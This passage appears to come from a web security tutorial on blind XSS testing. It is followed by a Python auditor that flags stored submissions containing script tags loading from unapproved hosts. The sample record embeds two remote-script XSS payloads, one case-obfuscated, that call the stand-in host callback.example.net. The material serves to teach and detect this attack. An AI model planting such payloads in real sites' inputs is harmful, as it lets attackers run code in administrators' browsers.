Blind XSS

With blind XSS, we cannot see how our payload is handled by the browser and the server. The payload may execute only on specific pages we do not have access to, such as an administrative panel.

To test for a blind XSS vulnerability, we can try to load a remote script hosted on our attacker server and check whether that server receives a GET request. We can change the URL path requested for each parameter to identify which parameter is vulnerable.
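Seen from the application side, this kind of test leaves stored input containing a script tag that points at an unfamiliar host. The following is an added example, not part of the original page, that audits stored submissions for such tags before they are rendered in a back-office view. The allow-list, field names and host names are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts the application legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"app.example.com"}


class RemoteScriptFinder(HTMLParser):
    """Collects (host, path) of <script src=...> tags outside the allow-list."""

    def __init__(self):
        super().__init__()
        self.remote_scripts = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag != "script":
            return
        src = dict(attrs).get("src") or ""
        parsed = urlparse(src)  # also resolves protocol-relative //host/path
        if parsed.hostname and parsed.hostname not in ALLOWED_SCRIPT_HOSTS:
            self.remote_scripts.append((parsed.hostname, parsed.path))


def audit_submission(record):
    """Return {field: [(host, path), ...]} for fields carrying remote script tags."""
    findings = {}
    for field, value in record.items():
        finder = RemoteScriptFinder()
        finder.feed(str(value))
        finder.close()
        if finder.remote_scripts:
            findings[field] = finder.remote_scripts
    return findings


# Constructed sample: a stored contact-form entry awaiting review by an admin.
SAMPLE = {
    "name": 'Alice<script src="https://callback.example.net/name"></script>',
    "email": "alice@example.org",
    "comment": "Hi <SCRIPT SRC=//callback.example.net/comment></SCRIPT>",
    "signature": '<script src="https://app.example.com/widget.js"></script>',
}

if __name__ == "__main__":
    for field, hits in audit_submission(SAMPLE).items():
        print(field, hits)
```

The reported path often mirrors the field that was probed, which helps triage which input is stored and rendered without encoding.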
